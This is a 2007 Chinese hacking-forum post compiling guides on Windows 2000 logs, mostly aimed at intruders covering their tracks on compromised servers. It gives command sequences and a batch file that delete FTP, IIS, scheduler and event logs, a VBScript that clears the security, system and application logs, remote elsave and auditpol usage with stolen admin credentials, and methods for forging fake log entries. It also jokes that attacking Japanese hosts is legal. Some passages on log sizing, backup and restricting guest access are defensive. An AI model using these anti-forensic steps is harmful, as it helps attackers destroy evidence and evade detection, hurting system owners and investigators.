Board logo

标题: [技术文章] 详解入侵日志清除方法 [打印本页]

作者: shillan    时间: 2007-6-1 23:26     标题: 详解入侵日志清除方法

首先来讲解ftp和www日志
ftp日志→ftp日志和www默认日志为每天生成一个日志文件,包含了每天的一切记录,文件名通常为ex(年份)(月份)(日期),
例如ex051218,就是2005年12月18日记录的日志,选用记事本打开方式就可直接打开,如下例:
#software: microsoft internet information services 5.0(微软iis5.0)
#version: 1.0 (版本1.0)    #date: 20051218 0516 (服务启动时间日期)
#fields: time cip csmethod csuristem scstatus
0315 192.168.1.30 [1]user administator 331 (ip地址为192.168.1.30用户名为administator试图登录)
0318 192.168.1.30 [1]pass ╟ 123 (登录失败)
032:04 192.168.1.30 [1]user new 321 (ip地址为192.168.1.30用户名为new的用户试图登录)
032:06 192.168.1.30 [1]pass ╟ 123 (登录失败)
032:09 192.168.1.30 [1]user hack 321 (ip地址为192.168.1.30用户名为hack的用户试图登录)
0322 192.168.1.30 [1]pass ╟ 123 (登录失败)
0322 192.168.1.30 [1]user administrators 234 (ip地址为192.168.1.30用户名为administrators试图登录)
0324 192.168.1.30 [1]pass ╟ 234 (登录成功)
0321 192.168.1.30 [1]mkd new 345 (新建目录失败)
0325 192.168.1.30 [1]qutt ╟ 123 (退出ftp程序)
从上面日志记录里能看出来ip地址为192.168.1.30的用户一直试图登录系统,换了4次用户名和密码才成功,
可以得知入侵时间、ip地址以及探测的用户名,如上例入侵者最终是用administrators用
户名进入的,那么就要考虑更换此用户名的密码,或者重命名administrators用户。

www日志→www服务同ftp服务一样,产生的日志也是在%systemroot%\system32\logfiles\w3svc1目录下,
默认日志为每天生成一个日志文件,下面是一个典型的www日志文件:
#software: microsoft internet information services 5.0        
#version: 1.0
#date: 20051120 02:081
#fields: date time cip csusername sip sport csmethod csuristem csuriquery scstatus cs(useragent)
20051120 02:081 192.168.1.29 192.168.1.39 80 get /iisstart.asp 200 mozilla/4.0+(compatible;+msie+5.0;+windows+98;+digext)
20051120 02:085 192.168.1.29 192.168.1.39 80 get /pagerror.gif 200 mozilla/4.0+(compatible;+msie+5.0;+windows+98;+digext)
通过分析第六行,可以看出2000年10月23日,ip地址为192.168.1.29的用户通过访问ip地址
为192.168.1.39机器的80端口,查看了一个页面iisstart.asp,这位用户的浏览器为compatible;+msie+5.0;+windows+98+digext,有
经验的管理员就可通过安全日志、ftp日志和www日志来确定入侵者的ip地址以及入侵时间。
既使你删掉ftp和www日志,但是还是会在系统日志和安全日志里记录下来,但是较好的是只显示了你的
机器名,并没有你的ip


学会怎样删除这些日志→通过上面知道了日志的详细情况,得知日志文件通常有某项服务在后台保护,
除了系统日志、安全日志、应用程序日志等等,它们的服务是windos的关键进程,而且与注册表文件在一块,
当操作系统(windows2000)启动后,启动服务来保
护这些文件,所以很难删除,而ftp日志和www日志以及scedlgu日志都是可以轻易地删除的。
首先要取得admnistrator密码或administrators组成员之一,然后telnet到远程主机,先来试着删除ftp
日志:
d:\server>del schedlgu.txt
d:\server\schedlgu.txt
进程无法访问文件,因为另一个程序正在使用此文件。
说过了,后台有服务保护,先把服务停掉!
d:\server>net stop "task scheduler"
下面的服务依赖于 task scheduler 服务。
停止 task scheduler 服务也会停止这些服务。

remote storage engine

是否继续此操作? (y/n) [n]: y
remote storage engine 服务正在停止....
remote storage engine 服务已成功停止。

task scheduler 服务正在停止.
task scheduler 服务已成功停止。
ok,它的服务停掉了,同时也停掉了与它有依赖关系的服务。再来试着删一下!
d:\server>del schedlgu.txt
d:\server>
没有反应?成功了!下一个是ftp日志和www日志,原理都是一样,先停掉相关服务,然后再删日志!
d:\server\system32\logfiles\msftpsvc1>del ex*.log

d:\server\system32\logfiles\msftpsvc1>
以上操作成功删除ftp日志!再来www日志!
d:\server\system32\logfiles\w3svc1>del ex*.log

d:\server\system32\logfiles\w3svc1>
ok!恭喜,现在简单的日志都已成功删除。下面就是很难的安全日志和系统日志了,守护这些日志的服
务是event log,试着停掉它!
d:\server\system32\logfiles\w3svc1>net stop eventlog
这项服务无法接受请求的 "暂停" 或 "停止" 操作。
kao,i 服了 u,没办法,它是关键服务。如果不用第三方工具,在命令行上根本没有删除安全日志和系
统日志的可能!所以还是得用虽然简单但是速度慢得死机的办法:打开“控制面板”的“管理工具”中的
“事件查看器”(98没有,知道用win2k的好处了吧),在菜单的“操作”项有一个名为“连接到另一台
计算机”的菜单,输入远程计算机的ip,请耐心等一会,选择远程计算机的安全性日志,右键选择它的属性:
点击属性里的“清除日志”按钮,ok了!安全日志清除完毕!
目前在不借助第三工具的情况下,能很快,很顺利地清除ftp、www还有schedlgu日志,就是系统日志和
安全日志属于windows2000的严密守护,只能用本地的事件查看器来打开它,因为在图形界面下,加之网
速又慢,如果你银子多,时间闲,还是可以清除它的。综上所述,介绍了windows2000的日志文件以及删
除方法,但是你必须是administrator,注意必须作为管理员或管理组的成员登录才能打开安全日志记
录。该过程适用于 windows 2000 professional 计算机,也适用于作为独立服务器或成员服务器运行的
windows 2000 server 计算机。

至此,windows2000安全知识基础讲座完毕,还有几句话要讲,大家也看出来了,虽然ftp等等日志可以很
快清除,但是系统日志和安全日志却不是那么快、那么顺利地能删除,如果遇到聪明的管理员,将日志文
件转移到另一个地方,想清除可是难上加难啊!!!所以奉劝大家,千万不要拿国人的主机做试验
(找小日本的不犯法~~~哈哈~~)

  全是很全,不过大家都忽略了一个问题!
如果一个服务器下管理有多个http或ftp站点的话,日志的,命名方法就不一样了!会出
现w3svc1,2,3....而这其中,又有一个是默认的远程网络管理日志(默认端口6959,如果开着这
个……呵呵,很大的一个漏洞!当然要有administrator权限……),所以要想判断一台服务器的具
体日志情况,我个人建议……要抹就抹个干净……只要是在logfile下的文件夹,全部删掉!~~~

win2k的日志文件详述及删除方法
windows2000的日志文件通常有应用程序日志,安全日志、系统日志、dns服务器日志、ftp日志、www日
志等等,可能会根据服务器所开启的服务不同。当我们用流光探测时,比如说ipc探测,就会在安全日志
里迅速地记下流光探测时所用的用户名、时间等等,用ftp探测后,也会立刻在ftp日志中记下ip、时间、
探测所用的用户名和密码等等。甚至连流影启动时需要msvcp60.dll这个动库链接库,如果服务器没有这
个文件都会在日志里记录下来,这就是为什么不要拿国内主机探测的原因了,他们记下你的ip后会很容易
地找到你,只要他想找你!!还有scheduler日志这也是个重要的log,你应该知道经常使用的srv.exe就
是通过这个服务来启动的,其记录着所有由scheduler服务启动的所有行为,如服务的启动和停止。
日志文件默认位置:

应用程序日志、安全日志、系统日志、dns日志默认位置:%systemroot%\system32\\

config,默认文件大
小512kb,管理员都会改变这个默认大小。安全日志文件:%systemroot%\system32\config
\secevent.evt
系统日志文件:%systemroot%\system32\config\sysevent.evt
应用程序日志文件:%systemroot%\system32\config\appevent.evt
internet信息服务ftp日志默认位置:%systemroot%\system32\logfiles\\

msftpsvc1\,默认每天一个日志
internet信息服务www日志默认位置:%systemroot%\system32\logfiles\\

w3svc1\,默认每天一个日志
scheduler服务日志默认位置:%systemroot%\schedlgu.txt
以上日志在注册表里的键:
应用程序日志,安全日志,系统日志,dns服务器日志,它们这些log文件在注册表中的:
hkey_local_machine\system\currentcontrolset\services\eventlog
有的管理员很可能将这些日志重定位。其中eventlog下面有很多的子表,里面可查到以上日志的定位目录。
schedluler服务日志在注册表中
hkey_local_machine\software\microsoft\schedulingagent


windows日志的保护与伪造
日志对于系统安全的作用是显而易见的,无论是网络管理员还是黑客都非常重视日志,一个有经验的管理员往往能够迅速通过日志了解到系统的安全性能,而一个聪明的黑客往往会在入侵成功后迅速清除掉对自己不利的日志。下面我们就来讨论一下日志的安全和创建问题。
一:概述:windows2000的系统日志文件有应用程序日志,安全日志、系统日志、dns服务器日志等等,应用程序日志、安全日志、系统日志、dns日志默认位置:%systemroot%\system32\config,默认文件大小512kb。
安全日志文件:%systemroot%\system32\config\secevent.evt
系统日志文件:%systemroot%\system32\config\sysevent.evt
应用程序日志文件:%systemroot%\system32\config\appevent.evt
这些log文件在注册表中的:
hkey_local_machine\system\currentcontrolset\services\eventlog
有的管理员很可能将这些日志重定位。其中eventlog下面有很多的子表,里面可查到以上日志的定位目录。

二:作为网络管理员:
1。日志的安全配置:
默认的条件下,日志的大小为512kb大小,如果超出则会报错,并且不会再记录任何日志。所以首要任务是更改默认大小,具体方法:注册表中hkey_local_machine\system\currentcontrolset\services\eventlog对应的每个日志如系统,安全,应用程序等均有一个maxsize子键,修改即可。
  下面给出一个来自微软站点的一个脚本,利用vmi来设定日志最大25mb,并允许日志自行覆盖14天前的日志:
该脚本利用的是wmi对象, wmi(windows management instrumentation)技术是微软提供的windows下的系统管理工具。通过该工具可以在本地或者管理客户端系统中几乎一切的信息。很多专业的网络管理工具都是基于wmi开发的。该工具在win2000以及winnt下是标准工具,在win9x下是扩展安装选项。所以以下的代码在2000以上均可运行成功。

strcomputer = "."
set objwmiservice = getobject("winmgmts:" _
    & "{impersonationlevel=impersonate,(security)}!\\" & _
        strcomputer & "\root\cimv2")               '获得vmi对象
set collogfiles = objwmiservice.execquery _         
    ("select * from win32_nteventlogfile")
for each objlogfile in collogfiles
    strlogfilename = objlogfile.name
    set wmiswbemobject = getobject _
        ("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2:" _
            & "win32_nteventlogfile.name='" & strlogfilename & "'")
    wmiswbemobject.maxfilesize = 2500000000
    wmiswbemobject.overwriteoutdated = 14
    wmiswbemobject.put_
next
将上述脚本用记事本存盘为vbs为后缀的即可使用。
另外需要说明的是代码中的strcomputer="."在windows脚本中的含义相当于localhost,如果要在远程主机上执行代码,只需要把"."改动为主机名,当然首先得拥有对方主机的管理员权限并建立ipc连接.本文中的代码所出现的strcomputer均可作如此改动.
2。日志的查询与备份:
一个优秀的管理员是应该养成备份日志的习惯,如果有条件的话还应该把日志转存到备份机器上或直接转储到打印机上,笔者还有一篇文章《利用脚本编程格式化输出系统日志》,详细的讲述了利用windows脚本把日志转储并输出成html页已便于查询,有兴趣的可以查看,在这里推荐微软的resourcekit工具箱中的dumpel.exe,他的常用方法:
dumpel -f filename -s \\server -l log
-f filename 输出日志的位置和文件名
-s \\server 输出远程计算机日志
-l log   log 可选的为system,security,application,可能还有别的如dns等
如要把目标服务器server上的系统日志转存为backupsystem.log可以用以下格式:
dumpel \\server -l system -f backupsystem.log
再利用计划任务可以实现定期备份系统日志。
另外利用脚本编程的vmi对象也可以轻而易举的实现日志备份:
下面给出备份application日志的代码:
backuplog.vbs
strcomputer = "."
set objwmiservice = getobject("winmgmts:" _
    & "{impersonationlevel=impersonate,(backup)}!\\" & _
        strcomputer & "\root\cimv2")                '获得 vmi对象
set collogfiles = objwmiservice.execquery _
    ("select * from win32_nteventlogfile where logfilename='application'")  '获取日志对象中的应用程序日志
for each objlogfile in collogfiles
    errbackuplog = objlogfile.backupeventlog("f:\application.evt")   '将日志备份为f:\application.evt
    if errbackuplog <> 0 then         
        wscript.echo "the application event log could not be backed up."
    else wscript.echo "success backup log"
    end if
next
程序说明:如果备份成功将窗口提示:"success backup log" 否则提示:"the application event log could not be backed up",此处备份的日志为application 备份位置为f:\application.evt,可以自行修改,此处备份的格式为evt的原始格式,用记事本打开则为乱码,这一点他不如dumpel用得方便。

三:作为黑客
1。日至清除
一个入侵系统成功后的黑客第一件事便是清除日志,如果以图形界面远程控制对方机器或是从终端登陆进入,删除日志不是一件困难的事,由于日志虽然也是作为一种服务运行,但不同于http,ftp这样的服务,可以在命令行下先停止,再删除,在m命令行下用net stop eventlog是不能停止的,所以有人认为在命令行下删除日志是很困难的,实际上不是这样,下面介绍几种方法:
   1.借助第三方工具:如小榕的elsave.exe远程清除system,applicaton,security的软件,使用方法很简单,首先利用获得的管理员账号与对方建立ipc会话,net use \\ip pass /user: user
然后命令行下:elsave -s \\ip -l application -c,这样就删除了安全日志。
其实利用这个软件还可以进行备份日志,只要加一个参数 -f filename就可以了,在此不再详述。
   2.利用脚本编程中的vmi,也可以实现删除日志,首先获得object对象,然后利用其cleareventlog() 方法删除日志。源代码:
cleanevent.vbs
strcomputer = "."
set objwmiservice = getobject("winmgmts:" _
    & "{impersonationlevel=impersonate,(backup)}!\\" & _
        strcomputer & "\root\cimv2")
dim mylogs(3)
mylogs(1)="application"
mylogs(2)="system"
mylogs(3)="security"
for each logs in mylogs
set collogfiles = objwmiservice.execquery _
    ("select * from win32_nteventlogfile where logfilename='"&logs&"'")
for each objlogfile in collogfiles   
        objlogfile.cleareventlog()     
next
next
在上面的代码中,建立一个数组,为application,security,system如果还有其他日志也可以加入数组。
然后用一个for 循环,删除数组中的每一个元素,即各个日志.
2。创建日志:
删除日志后,任何一个有头脑的管理员面对空空的日志,马上就会反应过来被入侵了,所以一个聪明的黑客的学会如何
伪造日志:
    1。利用脚本编程中的eventlog方法是创造日志变得非常简单;下面看一个代码
createlog.vbs
set ws=wscript.createobject("wscript.shell")
ws.logevent 0 ,"write log success"    '创建一个成功执行日志
这个代码很容易阅读,首先获得wscript的一个shell对象,然后利用shell对象的logevent方法
logevent的用法:logevent eventtype,"description" [,remote system]
eventtype 为日志类型,可以使用的如下:0 代表成功执行,1 执行出错 ,2 警告 , 4,信息 ,8 成功审计 16 故障审计
所以上面代码中,把0改为1,2,4,8,16均可,引号下的为日志描述。
这种方法写的日志有一个缺点,只能写到应用程序日志,而且日至来源只能为wsh,即windows scripting host,所以不能起太多的隐蔽作用。
   2,微软为了方便系统管理员和程序员,在xp下有个新的命令行工具,eventcreate.exe,利用它,创建日志更加简单。
eventcreate -s server -l logname  -u username -p password -so source -t eventtype -id id -d description
含义:-s 为远程主机创建日志: -u 远程主机的用户名 -p 远程主机的用户密码
-l 日志;可以创建system和application 不能创建security日志,
-so 日志来源,可以是任何日志 -t 日志类型 如information信息,error错误,warning 警告,
-d 日志描述,可以是任意语句  -id 自主日志为1-1000之内
例如,我们要本地创建一个系统日志,日至来源为admin,日志类型是警告,描述为"this is a test",事件id为500
可以用如下参数
eventcreate -l system -so administrator -t warning -d "this is a test" -id 500
这个工具不能创建安全日志。至于如何创建安全日志,希望大家能够找到一个好方法!

简单安全的删除自己在肉鸡日志文件里的ip
我觉得行最简单的删除日志文件的方法是:在肉鸡里点"开始"-搜索-文件或文件夹,在"包含文字"里输入你的ip,其它就不要输入了,点搜索就行了.
这个方法简单安全,记住一定要在"包含文字"里输入你的ip,不要在其它地方输入.这个方法百分之百的有效

大家不要笑我偷懒哦!就是这么简单
@net stop w3svc
@del c:\winnt\system32\logfiles\*.*
@del c:\winnt\system32\config\*.evt
@del c:\winnt\system32\dtclog\*.*
@del c:\winnt\system32\*.log
@del c:\winnt\system32\*.txt
@del c:\winnt\*.txt
@del c:\winnt\*.log
@del c:\del.bat
@del h:\winnt\system32\*.ip
@net start w3svc

由于我们单位的计算机不多,多人共用四台,以前使用windows 98,简直让我伤透了脑筋,老是有人向我抱怨别人偷看了或是删改了他的文件(被重新编辑了或是删除)。而作为管理员的我,头痛的是根本就没有办法来监督每个人的操作。现在几台机器全部装上了windows 2000,我可以对不同的用户赋予不同的权限,关键是可以限制登录用户去偷看或是删改其他用户的文件,而且我对所有用户的私人文件夹都设置了权限,并且使用了审核功能,只许本人使用。够严密了吧?可还是不可避免有个别用户想方设法要偷看其他用户的私人文件夹,怎么办呢?还好有了事件日志,通过它,我可以追踪这些让我不得安宁的坏人了,当然它也让我在维护计算机时轻松了不少。

  什么是事件日志呢?事件日志是专门记录计算机硬件、软件和系统整体方面的错误信息,也记录一些安全方面的问题。windows 2000有三种类型的事件日志:

  1、系统日志

  这种日志跟踪各种各样的系统事件,包括windows系统组件出现的问题,比如跟踪系统启动过程中的事件、硬件和控制器的故障、启动时某个驱动程序加载失败等。

  2、应用程序日志

  这种日志跟踪应用程序关联的事件,比如应用程序产生的像装载dll(动态链接库)失败的信息将出现在日志中。

  3、安全日志

  这种日志跟踪事件如登录上网、下网、改变访问权限以及系统启动和关闭。只是安全日志的默认状态是关闭的,这是我在设置本地安全策略后才产生的。

  在事件日志中,以下面几种情况来表示整个系统运行过程中出现的事件:

  (1)“错误”是指比较严重的问题,通常是出现了数据丢失或功能丢失。

  (2)“警告”则表明情况暂时不严重,但可能会在将来引起错误,比如磁盘空间太少等。

  (3)“信息”则是记录运行成功的事件。

  另外,安全日志则直接以成功审核和失败审核来标识事件的成功与否。

  由此可见,在这些事件日志里,存放着一些非常重要的信息,因为它记录着所有用户的操作,包括被审计了的操作,但是在默认的情况下,guest和匿名用户是可以查看事件日志的,个别别有用心的人做了坏事之后,总是想要查看事件日志上是否记录他的行为并且伺机抹掉他的活动痕迹,如删除日志文件,让我这个管理员事后想要取证也难,所以必须禁止guest和匿名用户访问事件日志,我利用修改注册表的方法来达到了禁止guest访问事件日志的目的。

  方法如下:

  打开注册表编辑器(在[开始]→[运行]框中输入“regedit”回车);

  禁止查看应用日志

  定位到 hkey_local_machine\system\currentcontrolset\services\eventlog \application

  新建一个双字节值,名称为:restrictguestaccess,值设为1。

  禁止查看系统日志

  定位到 hkey_local_machine\system\currentcontrolset\services\eventlog\ system

  新建一个双字节值,名称为:restrictguestaccess,值设为1。

  禁止查看安全日志

  在默认安装情况下,安全日志只有管理员才能查看。但是为避免别人在本地安全策略中修改权限,我们仍可以修改注册表要达到禁止查看的目的。定位到 hkey_local_machine\system\currentcontrolset\services\eventlog\ security

  新建一个双字节值,名称为:restrictguestaccess,值设为1。

  设置完以后,关闭注册表编辑器,重新启动计算机,以普通的guest用户登录一看,哈哈,guest用户已经不能查看事件日志了,就这样我轻松地保护了这几台计算机的事件日志,这些日志只有我这个管理员才可以查看,为避免自己的行为被日志记录后被我警告,那些人再也不敢乱动机器了。

安全事件日志中的事件编号与描述
帐号登录事件
(事件编号与描述)
672 身份验证服务(as)票证得到成功发行与验证。
673 票证授权服务(tgs)票证得到授权。tgs是一份由kerberos 5.0版票证授权服务(tgs)发行、且允许用户针对域中特定服务进行身份验证的票证。
674 安全主体重建as票证或tgs票证。
675 预身份验证失败。这种事件将在用户输入错误密码时由密钥分发中心(kdc)生成。
676 身份验证票证请求失败。这种事件在windows xp professional操作系统或windows server产品家族成员中将不会产生。
677 tgs票证无法得到授权。这种事件在windows xp professional操作系统或windows server产品家族成员中将不会产生。
678 指定帐号成功映射到一个域帐号。
681 登录失败。域帐号尝试进行登录。这种事件在windows xp professional操作系统或windows server产品家族成员中将不会产生。
682 用户重新连接到一个已经断开连接的终端服务器会话上。
683 用户在没有注销的情况下与终端服务器会话断开连接。

帐号管理事件
624 一个用户帐号被创建。
627 一个用户密码被修改。
628 一个用户密码被设置。
630 一个用户密码被删除。
631 一个全局组被创建。
632 一个成员被添加到特定全局组中。
633 一个成员从特定全局组中被删除。
634 一个全局组被删除。
635 一个新的本地组被创建。
636 一个成员被添加到本地组中。
637 一个成员从本地组中被删除。
638 一个本地组被删除。
639 一个本地组帐号被修改。
641 一个全局组帐号被修改。
642 一个用户帐号被修改。
643 一个域策略被修改。
644 一个用户帐号被自动锁定。
645 一个计算机帐号被创建。
646 一个计算机帐号被修改。
647 一个计算机帐号被删除。
648 一个禁用安全特性的本地安全组被创建。说明:正式名称中的security_disabled意味着这个组无法用于在访问检查中授予权限。
649 一个禁用安全特性的本地安全组被修改。
650 一个成员被添加到一个禁用安全特性的本地安全组中。
651 一个成员从一个禁用安全特性的本地安全组中被删除。
652 一个禁用安全特性的本地组被删除。
653 一个禁用安全特性的全局组被创建。
654 一个禁用安全特性的全局组被修改。
655 一个成员被添加到一个禁用安全特性的全局组中。
656 一个成员从一个禁用安全特性的全局组中被删除。
657 一个禁用安全特性的全局组被删除。
658 一个启用安全特性的通用组被创建。
659 一个启用安全特性的通用组被修改。
660 一个成员被添加到一个启用安全特性的通用组中。
661 一个成员从一个启用安全特性的通用组中被删除。
662 一个启用安全特性的通用组被删除。
663 一个禁用安全特性的通用组被创建。
664 一个禁用安全特性的通用组被修改。
665 一个成员被添加到一个禁用安全特性的通用组中。
666 一个成员从一个禁用安全特性的通用组中被删除。
667 一个禁用安全特性的通用组被删除。
668 一个组类型被修改。
684 管理组成员的安全描述符被设置。说明:在域控制器上,一个后台线程每60秒将对管理组中的所有成员(如域管理员、企业管理员和架构管理员)进行一次搜索并对其应用一个经过修复的安全描述符。这种事件将被记录下来。
685 一个帐号名称被修改。


审核登录事件
528 用户成功登录到计算机上。
529 登录失败:试图使用未知用户名或带有错误密码的已知用户名进行登录。
530 登录失败:试图在允许时间范围以外进行登录。
531 登录失败:试图通过禁用帐号进行登录。
532 登录失败:试图通过过期帐号进行登录。
533 登录失败:试图通过不允许在特定计算机上进行登录的用户帐号进行登录。
534 登录失败:用户试图通过不允许使用的密码类型进行登录。
535 登录失败:针对指定帐号的密码已经过期。
536 登录失败:网络登录服务未被激活。
537 登录失败:由于其它原因导致登录失败。说明:在某些情况下,登录失败原因可能无法确定。
538 针对某一用户的注销操作完成。
539 登录失败:登录帐号在登录时刻已被锁定。
540 用户成功登录到网络。
541 本地计算机与所列对等客户身份标识之间的主模式internet密钥交换(ike)身份验证操作已经完成(建立一条安全关联),或者快速模式已经建立一条数据通道。
542 数据通道被中断。
543 主模式被中断。说明:这种事件可能在安全关联时间限制到期(缺省值为8小时)、策略修改或对等客户中断时发生。
544 由于对等客户未能提供合法证书或签署未通过验证导致主模式身份验证失败。
545 由于kerberos失败或密码不合法导致主模式身份验证失败。
546 由于对等客户发送非法了非法提议,ike 安全关联建立没有成功。收到一个包含非法数据的数据包。
547 ike握手过程中发生错误。
548 登录失败:来自信任域的安全标识符(sid)与客户端的帐号域sid不匹配。
549 登录失败:在跨域身份验证过程中,所有同非信任名称空间相对应的sid均已被过滤掉。
550 能够指示可能发生拒绝服务(dos)攻击的通知消息。
551 用户发起注销操作。
552 用户在已经通过其他身份登录的情况下使用明确凭据成功登录到计算机上。
682 用户重新连接到一个已经断开连接的终端服务器会话上。
683 用户在没有注销的情况下与终端服务器会话断开连接。说明:这种事件将在用户通过网络与终端服务器会话建立连接时产生。它将出现在终端服务器上。


对象访问事件
560 访问由一个已经存在的对象提供授权。
562 一个对象访问句柄被关闭。
563 试图打开并删除一个对象。说明:当您在createfile()函数中指定file_delete_on_close标志时,这种事件将被文件系统所使用。
564 一个保护对象被删除。
565 访问由一种已经存在的对象类型提供授权。
567 一种与句柄相关联的权限被使用。说明:一个授予特定权限(读取、写入等)的句柄被创建。当使用这个句柄时,至多针对所用到的每种权限产生一次审核。
568 试图针对正在进行审核的文件创建硬连接。
569 身份验证管理器中的资源管理器试图创建客户端上下文。
570 客户端试图访问一个对象。说明:针对对象的每次操作尝试都将产生一个事件。
571 客户端上下文被身份验证管理器应用程序删除。
572 管理员管理器初始化应用程序。
772 证书管理器拒绝了挂起的证书申请。
773 证书服务收到重新提交的证书申请。
774 证书服务吊销了证书。
775 证书服务收到发行证书吊销列表(crl) 的请求。
776 证书服务发行了证书吊销列表(crl)。
777 更改了证书申请扩展。
778 更改了多个证书申请属性。
779 证书服务收到关机请求。
780 已开始证书服务备份。
781 已完成证书服务备份。
782 已开始证书服务还原。
783 已完成证书服务还原。
784 证书服务已经开始。
785 证书服务已经停止。
786 证书服务更改的安全权限。
787 证书服务检索了存档密钥。
788 证书服务将证书导入数据库中。
789 证书服务更改的审核筛选。
790 证书服务收到证书申请。
791 证书服务批准了证书申请并颁发了证书。
792 证书服务拒绝证书申请。
793 证书服务将证书申请状态设为挂起。
794 证书服务更改的证书管理器设置
795 证书服务更改的配置项。
796 证书服务更改属性。
797 证书服务存档了密钥。
798 证书服务导入和存档了密钥。
799 证书服务将证书发行机构(ca)证书发行到active directory。
800 从证书数据库删除一行或多行。
801 角色分隔被启用。

审核策略更改事件
608 用户权限已被分配。
609 用户权限已被删除。
610 与另一个域的信任关系已被创建。
611 与另一个域的信任关系已被删除。
612 审核策略已被更改。
613 internet协议安全性(ipsec)策略代理已经启动。
614 ipsec策略代理已被禁用。
615 ipsec策略代理已被更改。
616 ipsec策略代理遇到一个潜在的严重问题。
617 kerberos 5.0版策略已被更改。
618 经过加密的数据恢复策略已更改。
620 与另一个域的信任关系已被修改。
621 系统访问权限已被授予帐号。
622 系统访问权限已从帐号中删除。
623 审核策略以对等用户为单位进行设置。
625 审核策略以对等用户为单位进行刷新。
768 检测到一个森林中的名称空间元素与另一个森林中的名称空间元素发生冲突。说明:当一个森林中的名称空间元素与另一个森林中的名称空间元素发生重叠时,它将无法明确解析属于这两个名称空间元素的名称。这种重叠现象也称作冲突。并非针对每种记录类型的参数均合法。举例来说,诸如dns名称、netbios名称和sid之类的字段对于“toplevelname”类型的记录便是非法的。
769 添加了受信任的森林信息。说明:这种事件消息将在更新受信任的森林信息以及添加一条或多条记录时生成。针对每条添加、删除或修改的记录都将生成一条事件消息。如果在针对森林信任信息的单一更新操作中添加、删除或修改多条记录,生成的所有事件消息都将被分配一个相同且唯一标识符(称作操作编号)。这种方式使您能够判断出多条事件消息是由一次操作生成的。并非针对每种记录类型的参数均合法。举例来说,诸如dns名称、netbios名称和sid之类的字段对于“toplevelname”类型的记录便是非法的。
770 删除了受信任的森林信息。说明:查看编号为769的事件描述。
771 修改了受信任的森林信息。说明:查看编号为769的事件描述。
805 事件日志服务读取针对会话的安权限使用事件


权限使用事件
576 特定权限已被添加到用户访问令牌中。说明:这种事件将在用户登录时产生。
577 用户试图执行受到权限保护的系统服务操作。
578 在已经处于打开状态的受保护对象句柄上使用权限。


详细跟踪事件
592 已经创建新的过程。
593 已经退出某过程。
594 对象的句柄被重复
595 已经取得对象的间接访问权。
596 数据保护主密钥备份。说明:主密钥将供cryptprotectdata和cryptunprotectdata例程以及加密文件系统(efs)所使用。这种主密钥将在每次创建新增主密钥时予以备份。(缺省设置为90天。)密钥备份操作通常由域控制器执行。
597 数据保护主密钥已由恢复服务器恢复完毕。
598 审核数据已得到保护。
599 审核数据保护已取消。
600 分派给进程一个主令牌。
601 用户尝试安装服务。
602 一个计划作业已被创建。

面向审核系统事件的系统事件消息
512 正在启动 windows。
513 windows 正在关机。
514 本地安全机制机构已加载身份验证数据包。
515 受信任的登录过程已经在本地安全机制机构注册。
516 用来列队审核消息的内部资源已经用完,从而导致部分审核数据丢失。
517 审核日志已经清除。
518 安全帐户管理器已经加载通知数据包。
519 一个过程正在试图通过无效本地过程调用(lpc)端口来模拟客户端并针对客户端地址空间执行回复、读取或写入操作。
520 系统时间已更改。说明:这种审核操作通常成对出现。

保住你的肉鸡之日志的清除
以前写的,拿出来献丑一下吧!没什么技术性可言,给新手朋友看看的,hoho!~~~~~~~~~~~~~~~~~~~
有很多朋友,后门安置的都很不错,可是没过几天,肉鸡就不能用了,帐户也没有了??这是为什么,我想你没有清日志吧??
清日志是我入侵后最爱干的一件事~~而且忘记不了,黑客俗称出门扫地,呵呵!~~~~~~~~~~那么要想擦得干净,而且也要对要擦的是什么有所了解。我先跟大家说说都是哪些日志:
一。系统自带的日志。你可以如下操作:“开始-》设置—》控制面板-》管理工具-》事件查看器”。来打开系统自带的日志。分为:
1。应用程序日志:记录了重要的应用程序产生的错误和成功信息。
2。安全日志:主要记录着win2k操作系统的组件所产生的日志,比如iis中自带的ftp日志等等。
3。系统日志:主要记录审核策略的日志。
说到审核策略,我也要来说说。这个是不容忽视的,先看一下相关概念:
建立审核的跟踪记录是安全性的重要内容。监视对象的创建和修改提供了追踪潜在安全性问题的方法,帮助确保用户帐户的可用性并在可能出现安全性破坏事件时提供证据。 对系统执行与安全性相关的审核有三个主要步骤。
首先,必须打开要审核的事件类别。用户登录注销和帐户管理就是事件类别的典型例子。选定的事件类别组成了审核策略。第一次安装 windows 2000 时,没有选中任何类别,也就没有强制的审核策略。"计算机管理"列出了可以审核的事件类别。
其次,必须设置安全日志的大小和行为。
最后,如果您已经选择了审核目录服务访问类别或审核对象访问类别,则必须确定要监视访问的对象并相应地修改其安全描述符。例如,如果要审核用户为打开特定文件所做的尝试,可以针对特定事件在该文件上直接设置成功或失败属性。

那么对付审核策略我们这里有一个非常强大的工具auditpol.exe,这个是命令行下的审核策略配置实用程序。如图一。
有没有发现"审核策略"里的每个策略是不是和该命令行下的category提供的很像啊?其实就是一模一样的啦。再结合option参数的设置不就完全能够实现与本地设置策略的效果一样一样了吗!如图二。
下面,还是让我们来看看如何使用吧,很简单的。look 当然先查看一下当前的"审核策略"是个什么样子的。上面是为了能够看出该工具的效果,我将所有的策略全部都关闭了。如果那台"肉鸡"的系统也是这个样子的话,那最好了。都省了过多的使用这个工具了。不过为了安全还是要检查一下的。 结果如图三。
可是往往系统管理员会或多或少的开启一些的了如图四。
这样,我们如果在对该系统肆意操作之前就得先将这些开启的审核全部关闭。目的我不用说大家也该明白。呵呵,接着操作吧。利用/disable参数来关闭全部。
输入auditpol.exe /disable 来关闭所有的审核。
当然为了做完该做的事后,还是要原封不动的还原咯。我是个追求完美主义者。可是有人会说刚才我记不得哪些是开启哪些是关闭的了,怎么办呢?没关系的这样才完美嘛:如图五。

另外上面演示的是在本地,如果要远程呢??呵呵我们来看看:
f:>net use \\192.168.1.30\ipc$ password /u:administrator
命令成功完成。
f:\>auditpol.exe \\192.168.1.30 /enable /system:all /logon:all /account:success
running ...
audit information changed successfully on \\192.168.1.30 ...
new audit policy on \\192.168.1.30 ...
system = success and failure
logon = success and failure
object access = no privilege
use = no process
tracking = no
policy change = no
account management = no
directory service access = no
account logon = success
如果要关闭把上面的enable改成disable就可以啦!~~~~~~~~
审核策略就说到这里,还想继续了解的可以去参考有关书籍。接着上面说,知道了那3个系统自带的日志后,我们来看看怎么清除。首先看看基于ipc的远程删除日志的工具:一个是elsave,这个大家都很了解了吧,如下:
f:\tools\rizhi>elsave
elsave: you must use -f and/or -c

f:\tools\rizhi>elsave /?
usage: elsave [-s \\server] [-l log] [-f file] [-c] [-q]
